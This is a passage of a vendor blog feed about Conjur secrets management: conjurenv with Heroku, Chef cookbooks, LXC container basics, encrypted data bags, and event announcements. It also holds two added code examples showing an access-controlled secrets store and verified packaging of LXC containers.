This starts with a policy, a security topology that can be checked into source control. Conjur has a Ruby DSL for doing this. Here is the policy file for the demo factory:

 

In the policy we define the names for our variables (secrets) and give the layer “service” execute (get the value) privilege on those variables. Note that there is nothing sensitive in this policy file, we can check it into Github and make it public.

We load this policy into Conjur with the Conjur CLI like so:

conjur policy load --collection production policy.rb

This operation is idempotent.

You can now add values to the variables you defined in your policy file through the Conjur CLI like so:

conjur variable values add mandrill/api-key 98phe12p89hda

Now we need to create an identity for our Heroku app. We’ll create a host identity and add it to the policy’s “service” layer so it can read the variables we’ve defined in our policy.

conjur host create production/heroku/demo-factory-conjur
conjur layer hosts add production/demo-factory-1-0/service production/heroku/demo-factory-conjur

A neat feature of Conjur is that you can apply host identity via environment variables. We’ll use this capability to assign an identity to our Heroku app. We can use the heroku CLI to set the config vars.

 

Now our Heroku application can use its Conjur identity to fetch secrets at runtime. The host’s API key is a single secret that ops can manage without interfering with development, instead of multiple secrets that are used in code and .gitignored out of source control, which are troublesome to rotate or change.

The last part of the puzzle is creating a mapping of environment variables to secret names and updating our Procfile to use conjurenv. conjurenv is a subcommand in the Conjur CLI that allows you to use a mapping file to expose secrets as environment variables to any process.

Here is the mapping file for demo-factory:

 

Now we can run our app prefixed with conjurenv and it will be able to access secrets via environment variables. Demo Factory is a Sinatra app, so we update our Procfile like so:

web: bundle exec conjur env run -- bundle exec rackup config.ru

How is this better?

For starters, we don’t have secrets on our systems. Once the command wrapped by conjurenv exits, the environment variables are gone. Dust in the wind.

By definition, the policy is minimally scoped to the application. It is the least privilege that still gets the job done, the smallest possible turtle.

Our Heroku app has a granular level of access to the secrets it needs through Conjur. Execute permission means it can only view the value of the variable. It does not have “update” or “read” permissions to change the value or view the access control relationships, respectively.

Our security policy is now checked into source control where our teammates can read and review it. Making a pull request on a permissions change? This is a bright new world.

Secret rotation is no longer disruptive. When someone updates the value of a Conjur variable the dev workflow is not affected. The next time the app pulls down a secret via conjurenv it will be the updated value.

Secrets are accessed in a consistent way across environments. Developers, your CI system and the Heroku app all use conjurenv when they need a secret.

We have a full audit log of secrets access for our app. You can view audit events in the Conjur CLI or UI.
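An added example (not Conjur's code) that pulls together the RBAC and self-auditing requirements from the secrets-server post above and the conjurenv workflow of this post: an in-memory stand-in for the secrets server holding the layer, host and mandrill/api-key variable named in this post, execute/read/update privileges, an audit entry for every access attempt, and a conjurenv-style runner that puts secrets only in a child process's environment. The mapping format (a plain Ruby hash), the sentry/dsn variable and all secret values are assumptions:

```ruby
require 'rbconfig'

# Constructed in-memory stand-in for the secrets server (not Conjur's implementation).
class SecretsServer
  # execute = fetch the value, read = view metadata/ACLs, update = change the value
  PRIVILEGES = %w[execute read update].freeze

  attr_reader :audit

  def initialize
    @values  = {}                             # variable id => current value (ops-managed)
    @members = Hash.new { |h, k| h[k] = [] }  # layer id => host ids
    @grants  = []                             # [role, privilege, variable] (from policy)
    @audit   = []                             # every access attempt, allowed or denied
  end

  # Policy side: checked into source control, contains no secret values.
  def permit(role, privilege, variable)
    raise ArgumentError, "unknown privilege #{privilege}" unless PRIVILEGES.include?(privilege)
    @grants << [role, privilege, variable]
  end

  def add_host_to_layer(layer, host)
    @members[layer] << host
  end

  # Ops side: rotate a value without touching policy, code or the developer workflow.
  def set_value(variable, value)
    @values[variable] = value
  end

  # A host acts with its own grants plus those of every layer it belongs to.
  def roles_of(identity)
    [identity] + @members.select { |_, hosts| hosts.include?(identity) }.keys
  end

  def permitted?(identity, privilege, variable)
    roles_of(identity).any? { |role| @grants.include?([role, privilege, variable]) }
  end

  # Fetch a value; the attempt is logged whether or not it is allowed.
  def fetch(identity, variable)
    allowed = permitted?(identity, 'execute', variable) && @values.key?(variable)
    @audit << { identity: identity, variable: variable, allowed: allowed }
    raise SecurityError, "#{identity} may not execute #{variable}" unless allowed
    @values[variable]
  end
end

# Resolve a mapping { ENV_NAME => variable id } into an environment hash for one identity.
def resolve_env(server, identity, mapping)
  mapping.transform_values { |variable| server.fetch(identity, variable) }
end

# conjurenv-style run: the secrets live only in the child's environment and go with it.
# Returns true when the command exits 0, like Kernel#system.
def conjur_env_run(server, identity, mapping, *command)
  system(resolve_env(server, identity, mapping), *command)
end

# Policy objects named in this post; the sentry/dsn variable and all values are constructed.
def build_demo
  server  = SecretsServer.new
  layer   = 'production/demo-factory-1-0/service'
  host    = 'production/heroku/demo-factory-conjur'
  mapping = { 'MANDRILL_API_KEY' => 'mandrill/api-key', 'SENTRY_DSN' => 'sentry/dsn' }
  mapping.each_value { |variable| server.permit(layer, 'execute', variable) } # execute only
  server.add_host_to_layer(layer, host)
  server.set_value('mandrill/api-key', 'constructed-mandrill-key')
  server.set_value('sentry/dsn', 'https://constructed@sentry.example/1')
  { server: server, host: host, mapping: mapping }
end

if __FILE__ == $PROGRAM_NAME
  d = build_demo
  # The child process sees the secret; this process's ENV never does.
  ok = conjur_env_run(d[:server], d[:host], d[:mapping],
                      RbConfig.ruby, '-e', 'puts "child has key: #{ENV.key?("MANDRILL_API_KEY")}"')
  puts "child exit ok: #{ok}, parent has key: #{ENV.key?('MANDRILL_API_KEY')}"
  d[:server].audit.each { |entry| puts entry }
end
```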


Closing Thoughts

The Conjur Way is not Heroku-specific. You can apply a Conjur identity to other services outside your direct control as well: other PaaS solutions like Stackato or dotCloud, CI platforms like TravisCI or CircleCI, and so on. As long as you can configure your application through environment variables, you can use the pattern outlined in this post. The way you manage and distribute secrets should be the same, no matter your platform.

Our demo-factory is open-source, feel free to browse it on Github.

 

Conjur and Chef: Baking in Security https://www.cyberark.com/blog/conjur-and-chef-baking-in-security/ Mon, 20 Apr 2015 23:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-and-chef-baking-in-security/  

We have just released our official cookbook to the Chef Supermarket!

https://supermarket.chef.io/cookbooks/conjur

To see this cookbook in action, check out our brand-new SSH demo.

We wrote this cookbook to make it simple for you to apply a Conjur identity to nodes you are already managing with Chef. One benefit here is that accessing secrets in your Chef runs becomes much simpler if they are run on a host with a Conjur identity. Instead of managing encrypted data bags and their decryption keys, you can pass in secrets as environment variables and use ENV['mysecret'] in your recipes.

Example

Another benefit is that you aren’t using Chef to do SSH access management. Instead, you are organizing your security layout in a role-based manner: users into groups and hosts into layers. This means that when you need to add a new user or host, escalate privileges temporarily or remove users or hosts from your topology you don’t need to worry about modifying data bags and pushing them through your release process. Permissions changes happen instantly via Conjur’s replicated web services.

Finally, you have an audit trail. Any access to secrets, SSH logins/logouts and sudo calls – they are all logged and accessible via the Conjur CLI, UI or API.


I want to highlight the usage pattern we suggest for setting up your hosts with Conjur and Chef. This same pattern can be applied for other CM tools you may be using. There are three steps in this workflow.

1. Foundation

Include the conjur::conjurrc recipe in the base cookbook for your organization. This recipe configures the connection to the Conjur server endpoint and establishes SSL verification. Set attributes for your Conjur endpoint. None of these attributes are secret – you can check them into source control.

If you want Conjur to manage SSH access, include the conjur::install recipe in your base cookbook as well. This recipe installs and configures the packages required for Conjur SSH.

If you want to install the Conjur CLI on your hosts, include the conjur::client recipe. You’ll then be able to use the conjur env command for easy injection of secrets as environment variables into your scripts and applications.

This base configuration can be baked into an image for faster launches.

2. Identity

Once you have your base image, you need to apply a Conjur identity to your host. How you do this will depend on your infrastructure. We use AWS internally, so I’ll briefly walk through how we apply identity to our Jenkins executors.

We created a layer named ‘build-0.1.0/jenkins’. This layer has permissions to read different secrets needed by our CI jobs. Using host-factory, we created a token for hosts to enroll into this layer. This token is passed as a parameter to the CloudFormation stack that defines an auto-scaling group of EC2 instances. The user-data for the instances is a bash script that then uses this token to create and apply a host identity on instance launch. Instances launch, execute their user-data script and can then interact with Conjur.

Example

A Conjur identity can also be supplied entirely through environment variables. We’ll cover this in an upcoming post on applying identity to Heroku applications.

3. Configure

This step is only necessary if you want to manage SSH through Conjur. Include the conjur::configure recipe in your application cookbooks or roles. This recipe applies the Conjur host identity to finish the machine configuration.


In summary, applying Conjur identity to a host means applying base configuration, giving the host an identity and then running any post-identification steps necessary for your organization’s setup.

As always, pull requests welcome!

 

Top 5 Things To Do at RSA 2015 [Conjur Edition] https://www.cyberark.com/blog/top-5-things-to-do-at-rsa-2015-conjur-edition/ Mon, 20 Apr 2015 17:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/top-5-things-to-do-at-rsa-2015-conjur-edition/  

Conjur is happy to announce that we will be exhibiting at RSA Conference for the first time this year!  You may be asking yourself, why RSA? As the conference website states, “Throughout its history, RSA Conference has consistently attracted the world’s best and brightest in the field, creating opportunities for conference attendees to learn about IT security’s most important issues through first-hand interactions with peers, luminaries and emerging and established companies.”  We think our method of Security for DevOps fits perfectly within this mold which is why we are so excited to meet and help RSA attendees all week.


With over 20,000 attendees, 400 vendors, 300 sessions, and 500 speakers, it can be difficult to know how best to spend your time during your week in San Francisco. Here are 5 can’t-miss things to do at RSA 2015:

1) Attend this session: Is DevOps Breaking Your Company?

Conjur’s CEO, Elizabeth Lawler, will be discussing the relationship between DevOps and Security and sharing some tips on how to ensure that improved Security doesn’t disrupt your always-evolving DevOps flow. You can attend this 50-minute presentation on Wednesday, April 22nd at 9:10am PST in Moscone West, Room 3004.

2) Visit our booth: Moscone South #2738

We will have members from our Executive Team, Marketing, UX, and Sales at our booth during the conference.  Not only will you have the opportunity to learn more about how Conjur delivers Security for DevOps, but you can also register to win our raffle prize…an Apple Watch!

3) Take the Conjur DevOps Security Quiz

Think you know Security?  How about DevOps?  You can test your knowledge with our 5 question quiz either at the booth (which will register you for our raffle) or by taking it here.  Share your results with your team, assuming you aced it, or learn how, based on your answers, we can help you solve this problem.

4) Register for a Demo

When it comes to our primary use cases, Secrets Management and Access Control (SSH), don’t just take our word that our solutions work, try them out for yourself.  Either visit our booth or sign up for a demo here:

Upon signing up you will receive access to your own demo environment for 24 hours and will be able to replicate the use case during an interactive, self-paced tutorial.

5) Free Security Assessment

If you are looking for a deeper dive into our solution, or would like to discuss how Conjur could fit into your unique infrastructure environment, you need to sign up for our free Security Assessment. During this 30-minute conversation we will take the time to learn more about your architecture and provide you with ideas and best practices on how to stay secure and compliant without sacrificing speed and performance.

The last thing you can do is tweet us @ConjurInc if you have questions during or after the conference.  We are very excited to be at RSA this year and hope to meet you soon!

 

Conjur REST API Documented! https://www.cyberark.com/blog/conjur-rest-api-documented/ Fri, 10 Apr 2015 19:34:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-rest-api-documented/  

One of the great features of Conjur is that you can talk to it via a RESTful API. Unfortunately this API hasn’t been documented. Well no more!

Head to developer.conjur.net/api to see our new API documentation.

Now you have the power of the Conjur CLI without needing the CLI installed. This means you can use Conjur from your embedded devices, Windows platforms and esoteric Linux distros.

The docs are a work in progress but we have documented the routes most requested by you and will be adding more soon.

 

 

3 Questions for DevOpsGuys.com https://www.cyberark.com/blog/3-questions-for-devopsguys-com/ Thu, 09 Apr 2015 19:08:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-questions-for-devopsguys-com/  

As part of our guest blogging series we recently had the pleasure of speaking with James Smith and Steve Thair from DevOpsGuys.com. James (the Dev Guy) and Steve (the Ops Guy) have a super-active blog that features fantastic DevOps-related content. We sat down with them and asked 3 DevOps-related questions, which have been transcribed below. Enjoy!

1) Tell us a little about DevOpsGuys.com and how you got started in the industry and the blog?

In 2013 Steve and I realised that joining the forces of developers and operators was the solution to the emerging problems in contemporary software development.

DevOpsGuys is a response to a gap in the market. Cloud computing technology is developing at breakneck speed and through streamlined, integrated efficiency, DevOpsGuys ensure every stage of a business’ online development is run by a single team of experts working closely, sharing skills, and keeping up with the latest industry developments.  For us, DevOps is a philosophy rather than a process. Coming respectively from a development and an operations background it became obvious that both of our roles essentially focused around achieving the same end goal, so rather than passing tasks and problems back and forth between us, it seemed far more productive to work together to make sure the job in its entirety was complete.

A consolidated approach to application delivery and managed operations is vital for businesses to optimise online applications, stay ahead of digital advances, and, more importantly, their competitors.

We exist to make life simpler and to optimise every system, application and process. Not every business can do this internally, so our job is to simplify the web management side of a business while you focus on adding value to your business.


One of the key principles of DevOps is sharing. We’re open and transparent about everything that we do and we really want to see the digital marketplace thriving. The Blog is essentially our way of sharing our knowledge, thoughts, and experiences with the world. It’s a co-operative affair; we love sharing other people’s work and ideas, too, and we often feature guest blogs and review relevant articles where we can.

We currently offer three services: a DevOps Maturity Assessment, a Managed Operations service and an Application Delivery service. We’ve just set up HQ in Cardiff and have received support from the Welsh Government to develop the IT sector in this part of the UK.

2) What is the biggest myth about DevOps that you routinely see communicated today?

Probably that DevOps is a system or a process that once you’ve ‘done it’ your business will be transformed and you can carry on again as normal.  DevOps is a cultural shift as well as a technological one, so for someone it could be a lengthy transition; eliminating internal silos, changing the way departments share data and information as well as implementing new software, systems and processes. But for everyone it’s an ongoing strategy that you adopt and use and update all the time.

3) For a company who does not currently have a DevOps culture, what is the single most important thing they should do within their organization before embarking on the journey?

Establishing goals.  If you don’t know where you want to be you can’t get there, but you also need to know where you’re starting: taking a DevOps maturity assessment is the only way to understand where you are now, how much work you have to do and what that work is. From there you can begin to plan your journey from A to B and meet your goals. The best advice we’ve seen is Jesse Robbins’ presentation on culture. Check it out.

Thanks again for the time James and Steve! We look forward to more great DevOps content from you guys.

 

Securing Third-Party Access, A Weak Link in Enterprise IT https://www.cyberark.com/blog/securing-third-party-access-a-weak-link-in-enterprise-it/ Wed, 08 Apr 2015 09:00:23 +0000 https://www.cyberark.com/blog//

Many external users require access to your network in the course of normal operations. It’s an inevitable part of doing business today. This access facilitates business productivity, allowing external and internal users to collaborate efficiently on projects, address maintenance issues quickly, and provide seamless services to your environment.

Yet recent high-profile attacks reveal that malicious hackers are increasingly targeting third-party vendors and supply chain partners as they often have less sophisticated security policies and controls than the actual target companies, and provide an open backdoor for attackers. Recent research shows that 63 percent of data breaches are caused by security vulnerabilities introduced by third parties. And it’s not hard to see why – today’s leading institutions have between 200 and 300 high-risk, third-party relationships at a time.

Attackers target these less secure partners to compromise remote access points, steal and exploit privileged credentials, and gain access to targeted networks. From here, attackers can elevate privileges, move laterally through the network, and execute their attack goals while completely circumventing the targeted company’s defenses.

Understanding common remote vendor access types and associated vulnerabilities is the first step in mitigating this risk. To that end, we’ve published a new security brief to provide organizations with guidance on how to address remote vendor access as a privileged access point that requires tight security controls. Topics covered include: approaches for managing and securing third-party credentials, how to isolate and monitor external sessions, and the importance of threat detection capabilities in security solutions for third-party access.

You can download this free security brief here: www.cyberark.com/remote-vendor.

With the proper privileged account security controls in place, organizations can provide the network access required for business efficiency while maintaining consistent security across all types of accounts – internal and external.

Today’s Advanced Persistent Threats and WarGames? https://www.cyberark.com/blog/todays-advanced-persistent-threats-and-wargames/ Thu, 02 Apr 2015 20:36:07 +0000 https://www.cyberark.com/blog//

One of the most well-known hacker movies is WarGames. Given the movie was from the 80s, there are a lot of cringe-inducing scenes – especially when it comes to the hack itself. There’s no way a teenager could hack into the most advanced military weapons in the world, is there?

Sometimes life imitates art, which is why the recent news that the Pentagon’s Chief Weapons Tester found “significant vulnerabilities” to cyber attacks was so disconcerting. This comes more than 30 years after the movie was made…

The tests were conducted across more than 40 of the most advanced military weapon systems, and all of them were found to have profound weaknesses that could be exploited in a cyber attack.

According to the report, “one of the most nagging problems that cyber security faces, no matter how many times they update procedure, are ‘compliance’ problems: human error, unpreparedness and exploits as meager as bad passwords. And once a hacker gets access to a single weak password, it can lead to ‘rapid access and exploitation’ of an entire weapons system.”

This is especially true when the weak password is supposed to secure a privileged account. Cyber attackers covet privileged accounts because of the broad power and access they provide. The theft and exploitation of these accounts have led to some of the biggest data breaches in the past few years – but they’ve also been at the heart of some of the most devastating critical infrastructure attacks in recent memory.

In the most well-known cyber attack of our time, the default password securing a privileged account on a Siemens PLC was exploited to inject the Stuxnet malware into the network at the Natanz nuclear facility. The destruction caused by the malware was done through an exploit that is common to this day and easily discoverable on the Internet.

Aside from the sheer physical damage that a cyber attack can cause, the vulnerability of our top weapon systems is incredibly scary when you look at how attackers are using these same vulnerabilities to completely take over a targeted company’s infrastructure, as was done in the recent Sony and Sands Hotel attacks. Make no mistake, these attacks were not just about stealing data, they represented the hostile takeover of both companies’ networks.

This is the power of privileged accounts – they provide attackers with an all-access pass to a network, enabling them to go wherever and do whatever they want without hindrance.

Last year, the U.S. Department of Homeland Security published an RFI for Phase 2 of the Continuous Diagnostics and Mitigation (CDM) program focusing on Least Privilege and Infrastructure Integrity. CyberArk addresses multiple requirements in Phase 2 of the CDM program with our Privileged Account Security Solution.  We provide more detail on this in our new whitepaper – a ‘must read’ for federal agencies.

To learn more about how to get started on securing privileged accounts and credentials, check out the CyberArk Privileged Account Security Solution.

Let’s Talk Encrypted Data Bags https://www.cyberark.com/blog/lets-talk-encrypted-data-bags/ Thu, 02 Apr 2015 00:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/lets-talk-encrypted-data-bags/  

How should I manage secrets that Chef needs to configure my systems? This is a question that many of us that use Chef struggle with. Should I use encrypted data bags? What about chef-vault, what is it and how does it improve on encrypted data bags? Does it matter whether our infrastructure is cloud, on-prem or a mix of both?

Encrypted data bags, and tooling like chef-vault built around them, can be great mechanisms for secrets storage and retrieval in certain contexts, but there are disadvantages to this solution that we should be aware of. Depending on your environment, the following drawbacks may or may not matter to you.

1. Encrypted data bags solve one problem and create another.

You store your secrets in data bags and use a key to encrypt them so you can check the JSON into source control. Your secrets are now encrypted and available, but only to those people and machines that have the decryption key. Now you have a key management problem: how do I make sure the right people and machines get these keys securely?

2. chef-vault’s best feature is also its worst feature

chef-vault solves the key management problem of encrypted data bags by encrypting duplicate data bag items with the public keys of the nodes that require access. This is great: we can reuse the private/public key pairs that already exist on the Chef nodes.

The downside here is that we need to know the list of nodes at encryption time. Every time we want to add/remove a node or admin we have to re-encrypt the data bag (vault) with our new list. Getting this to work with autoscaling or self-healing systems requires a lot of work. If a tool is fighting you when you are adapting it to your use case, it’s probably not the right tool.

3. Least privilege gets complicated, fast

When using encrypted data bags you are limited to one decryption key per node. That means that if you have anything but a dead-simple infrastructure you are going to need a lot of encrypted data bags. Enforcing least privilege will require you to set up and maintain a different data bag for every permutation of secrets a node will need.

For example, Service A needs the PostgreSQL password and AWS keys. Service B needs the AWS keys as well but doesn’t deal with PostgreSQL – oh and it also needs your Hipchat API token. You can see how this can get out of hand really quickly. Our infrastructure is also not static – when Service A now needs the RabbitMQ creds we need to update the data bag. As services change, are born or retire we need to spend a good amount of time managing our data bags to keep up.

No one wants to do this maintenance, so practically what this means is that we end up stuffing all of our secrets into one data bag and feeling bad about ourselves.

4. Auditing is important

Keeping an easily accessible and searchable audit log of access to secrets in your system is a necessity, whether or not your organization is legally required to be compliant. You can demonstrate your PCI/SOX/etc. compliance more easily with this data. If a breach occurs, having a log of access will allow you to find out what happened and react more quickly. Access logs for data bags will not be enough to make sense of your system.

5. We write cookbooks

We are infrastructure engineers: we write cookbooks and put them through their paces with test-kitchen. Mocking out data bags with dummy attributes in our .kitchen.yml, or gitignoring a .kitchen.local.yml or data bags containing real secrets, is not ideal. Usually this just slows us down. Our CI environments should have access to secrets for integration and acceptance tests too, right? Treating dev and test environments differently from prod when it comes to secrets undermines the parity that we have been working so hard to achieve.

So what?

I’ve laid out the circumstances in which I think encrypted data bags don’t work. So what are we supposed to do? You could roll your own solution; a lot of people do this. Most aren’t very happy with maintaining it. Or you could come talk to us at Conjur; we think we’ve got a pretty compelling solution to the problem.

Conjur is at ChefConf 2015! https://www.cyberark.com/blog/conjur-is-at-chefconf-2015/ Tue, 31 Mar 2015 16:53:00 +0000

Today kicks off ChefConf 2015, and Conjur is proud to be a first-time sponsor of the event. Not only are we excited to leave our still snowy New England weather, but we are also looking forward to meeting all of the attendees who should help to make this ChefConf the biggest and most successful one yet.

If you happen to be one of the lucky ones who find themselves in Santa Clara this week, please stop by and say hello. There are a few ways you can find us:

Simply look for our slick Conjur polo shirts or tweet us @ConjurInc and we will be sure to answer any questions you may have.

As you can see, it will be a busy few days here at ChefConf but we are excited to get started and meet you all!

 

How LXC Works https://www.cyberark.com/blog/how-lxc-works/ Tue, 31 Mar 2015 14:00:00 +0000

LXC containers are built from templates, which are basically shell scripts. If the shell script uses some additional software, you have to have that software installed or the template won’t work. Here are some typical dependencies of common templates:

  • Bridge utils (namely the brctl utility) for managing Linux bridges;

  • Debootstrap, to install a Debian-based system from an already running OS. You will need it if you decide to use a template to create a container with Ubuntu or Debian (or any other Debian-based distro);

  • RPM package management, needed to create a container running an ALT Linux, OpenSuse or OpenMandriva distribution. For Fedora, Oracle Linux and CentOS you additionally need to install the Yum package manager;

  • Pacman package management, needed to create a container with Arch Linux.

Keep these in mind when you create a new container.

The files in an LXC container are simply the files in /var/lib/lxc/<container-name>, a directory which contains:

  • rootfs – contains files of the guest OS

  • config – configuration file for a container

  • fstab – contains mount information in fstab format

The workflow with LXC proceeds according to the following basic pattern:

  • Start a new LXC container, using a base template.

  • Install software and otherwise configure the container.

  • At checkpoints, clone the container to create “frozen” copies (not to be confused with lxc-freeze). This operation does nothing more than create a copy of the container filesystem in /var/lib/lxc/<new-container>/rootfs.

  • Once you have a working container, all you have to do is create a tarball of the files. The container can then be launched on a different server by transferring the tarball, unpacking it, and running it using LXC tools.
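As an added example (not code from the original post or from the LXC project), here is the last step of that workflow as a shell script: it packages a container directory into a tarball together with a SHA-256 digest and refuses to unpack the tarball on the destination unless the digest matches, so a corrupted or tampered transfer is noticed before anything is launched. The base directory is a parameter (an assumption made here so the demo can run unprivileged against a constructed tree instead of /var/lib/lxc), and the script assumes GNU tar and sha256sum.

```shell
# Added example, not part of the original post or of LXC itself.
# Layout assumed: BASE/NAME/{rootfs/,config,fstab}, as described above.

# pack_container BASE NAME OUTDIR: writes OUTDIR/NAME.tar.gz plus an
# OUTDIR/NAME.tar.gz.sha256 digest file from the container under BASE/NAME.
pack_container() {
    local base=$1 name=$2 outdir=$3
    if [ ! -d "$base/$name/rootfs" ]; then
        echo "pack_container: no rootfs under $base/$name" >&2
        return 1
    fi
    # -C keeps the archived paths relative, so it unpacks under any base dir.
    tar -czf "$outdir/$name.tar.gz" -C "$base" "$name" || return 1
    ( cd "$outdir" && sha256sum "$name.tar.gz" > "$name.tar.gz.sha256" )
}

# unpack_container ARCHIVE DEST: verifies ARCHIVE against the .sha256 file
# next to it and only then extracts it under DEST.
unpack_container() {
    local archive=$1 dest=$2 dir file
    dir=$(dirname "$archive")
    file=$(basename "$archive")
    if ! ( cd "$dir" && sha256sum -c --status "$file.sha256" ); then
        echo "unpack_container: digest mismatch for $archive, refusing to unpack" >&2
        return 1
    fi
    mkdir -p "$dest" && tar -xzf "$archive" -C "$dest"
}

# demo_container_roundtrip: builds a constructed container tree, round-trips
# it through pack/unpack, checks the copy is identical, then corrupts the
# archive and checks that unpacking is refused. Returns 0 when all of that holds.
demo_container_roundtrip() {
    local work
    work=$(mktemp -d) || return 1
    # Constructed stand-in for /var/lib/lxc/ubuntu-01 (not a real rootfs).
    mkdir -p "$work/src/ubuntu-01/rootfs/etc"
    echo "lxc.utsname = ubuntu-01" > "$work/src/ubuntu-01/config"
    echo "proc proc proc nodev,noexec,nosuid 0 0" > "$work/src/ubuntu-01/fstab"
    echo "ubuntu-01" > "$work/src/ubuntu-01/rootfs/etc/hostname"

    pack_container "$work/src" ubuntu-01 "$work" || return 1
    unpack_container "$work/ubuntu-01.tar.gz" "$work/dst" || return 1
    diff -r "$work/src/ubuntu-01" "$work/dst/ubuntu-01" >/dev/null || return 1

    # Simulate corruption in transit: one extra byte must break the digest.
    printf 'x' >> "$work/ubuntu-01.tar.gz"
    if unpack_container "$work/ubuntu-01.tar.gz" "$work/dst2" 2>/dev/null; then
        return 1
    fi
    rm -rf "$work"
}

demo_container_roundtrip && echo "container round trip and digest check OK"
```

On a real host you would run pack_container against /var/lib/lxc as root, copy both the tarball and the .sha256 file to the destination, and let unpack_container place the container under /var/lib/lxc there before starting it with the LXC tools. The digest only detects accidental or in-transit changes; it does not authenticate who produced the archive, so for untrusted transports you would sign the digest file as well.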

A Simple Example

Let’s create a first container:

$ sudo lxc-create -t ubuntu -n ubuntu-01

The first run takes about five minutes, because lxc-create runs the ubuntu template, which builds a new rootfs and copies it to /var/lib/lxc/ubuntu-01. LXC uses /var/lib/lxc/ to store containers and /var/cache/lxc/ as a cache (mainly used by lxc-create and the templates).

Now let’s start it (the login and password are both ubuntu):

$ sudo lxc-start -F -n ubuntu-01

Note that the guest OS has its own init process and a running sshd; in general it is not very different from a machine running somewhere on EC2. Running ifconfig, you will see that the container has a network interface configured by DHCP. This is the default, so you do not need to worry about it. To get back to your host shell you have to shut the container down, which you can do in two ways:

  • Shutdown command in the container: $ sudo shutdown -h now

  • Close the console window.

This is because you started the container without the -d option (the default behaviour in old versions of LXC) and with the -F (foreground) option. LXC does not let you detach from a container that was not launched in the background.

Templates

A template is just an executable file, usually (but not necessarily) written in bash, that creates the container rootfs. lxc-create invokes the template and performs the rest of the work to create the container. Keep in mind that many template scripts depend on additional programs, which are mentioned at the beginning of this article. Templates live in /usr/share/lxc/templates.

 At the moment, there are templates for Alpine Linux, ALT Linux, Arch Linux, CentOS, CirrOS, Debian, Fedora, Gentoo, OpenMandriva, OpenSUSE, Oracle Linux, Plamo Linux, and Ubuntu.

Among the templates are also some unusual finds:

  • busybox creates a minimalist, lightweight container that has only busybox installed

  • sshd is normally used to let untrusted users into your private network

  • ubuntu-cloud downloads an OS image built by Canonical from https://cloud-images.ubuntu.com/, decompresses it and modifies it to work in LXC

  • download fetches images built by the LXC team, primarily adapted for use in unprivileged containers (containers run by non-root users)

Almost all of the templates have additional options, which you can list by passing --help to the template through lxc-create. Use -- (two dashes) to separate the lxc-create options from the template options:

$ sudo lxc-create -t ubuntu -n ubuntu-02 -- --help
/usr/share/lxc/templates/lxc-ubuntu -h|--help [-a|--arch] [-b|--bindhome <user>] [-d|--debug]
   [-F | --flush-cache] [-r|--release <release>] [ -S | --auth-key <keyfile>]
   [--rootfs <rootfs>] [--packages <packages>] [-u|--user <user>] [--password <password>]
   [--mirror <url>] [--security-mirror <url>]

 

The First Fully Hosted Conjur Demo https://www.cyberark.com/blog/the-first-fully-hosted-conjur-demo/ Fri, 27 Mar 2015 14:20:00 +0000

Legendary User Experience Designer Jared Spool once said “If you are not talking to your users two or three times a week, you are not doing User Experience Design.” These words have shaped the core of my approach for the last five years. So, three months ago, when I was brand-spanking new at Conjur, the first order of business was to elbow my way into every sales call, support call, and design partner engagement that I could. That’s part of what’s great about working at Conjur. They let you do stuff like that. In fact, they encourage it.

At one point I was sitting in on a call between the Conjur Sales Team and a smart, highly technical DevOps leader at a large travel site.

He was looking to use our system to improve the way his team was sharing secrets data. This guy really ‘got it’ and realized the value Conjur would bring to his continuous delivery pipeline.  Before he was ready to set up a POC in his own environment, however, he had one simple request…

“I want to see it go. Let me see it.”

This was a problem.

Conjur is part of a pipeline. It’s easy for us to spin up a Conjur virtual appliance but in order to really ‘see it go’ you need to have some kind of operations environment, sample code, the command-line tools, and a scenario to run through.

Here was an opportunity for User Experience Design to help solve a fundamental problem and support a key business goal. This had nothing to do with js animation, shiny ui controls, or any of the other visual design activities that are often mistaken for User Experience Design. This was about reducing time to value for new users in order to drive adoption.

Ideally, someone who is new to Conjur would be able to see the system ‘do something’ valuable from their own terminal window without having to set-up, download, or install anything.  At the time, there was no way to do this easily or on-demand.

Now there is.

Welcome to Conjur Demos!

Basically, you submit this form to get a fully provisioned cloud machine running the Conjur server, Conjur client, Docker, and Git. It comes pre-installed with sample code, and there is a detailed walk-through of a secrets management workflow.

The example workflow Secrets Management (Done Right) outlines a pretty typical DevOps scenario.

You have an application that requires access to a database server in order to run. Consequently, the application needs a database password to get the proper access. The instructions show how to store that secret securely, supply it temporarily to the application at run time, and audit the activity in detail.

We will be publishing more demo scenarios in the next few weeks including SSH Management Basics, Managing Access with Layers, and calling out to a demo appliance using stripped-down hardware and the REST API. At the moment there are no limits on how you use the demo environment, so if you have an idea for using Conjur to try your own innovative access management solution, fire up a demo and watch it go.

Of course, if you have anything to say about how the demo experience did or didn’t work for you, I would love to talk to you about it.

 

Chef cookbook uploads with Conjur https://www.cyberark.com/blog/chef-cookbook-uploads-with-conjur/ Thu, 26 Mar 2015 18:05:00 +0000

In preparation for our workshop at ChefConf we created a new organization in Hosted Chef and uploaded some starter cookbooks. The best practice here is to create a specific user with permissions to only upload cookbooks. This ensures that the agent in your system responsible for uploading cookbooks cannot affect the rest of your Chef server. Conjur makes this very easy to do securely. Here are the steps:

I created a new user on Hosted Chef to be our trusted agent for deploys. In our case this is robot+deploy@conjur.net

I stored the user’s Chef private key, which I downloaded from the Hosted Chef UI, as a Conjur variable. Here $pem is the file holding the private key content.


cat $pem | conjur variable create --as-group v4/ops hostedchef/conjurbot/private_key

Here’s the cool part. I created a mapping file for conjur env to supply the private key at run time.

.conjurenv

CLIENT_PEM: !tmp hostedchef/conjurbot/private_key

Now when we use conjur env run, the private key is pulled from Conjur, stored in a temporary file and CLIENT_PEM is an environment variable containing the path to that file.

I can now use that environment variable in knife.rb to provide authentication.

knife.rb

log_level :info
log_location STDOUT
node_name 'conjurbot'
# path of the temporary key file created by `conjur env run`
client_key ENV['CLIENT_PEM']
chef_server_url 'https://api.opscode.com/organizations/chefconf15-conjur'

Now when I want to upload cookbooks I don’t have to hunt around for the private key or even have it on my system.


conjur env run -- knife cookbook upload .

Once the upload finishes, the private key is no longer on your system and access to the key is audited in Conjur. Here you can see I have permitted the build layer, which contains our Jenkins systems, to execute (read) the secret.
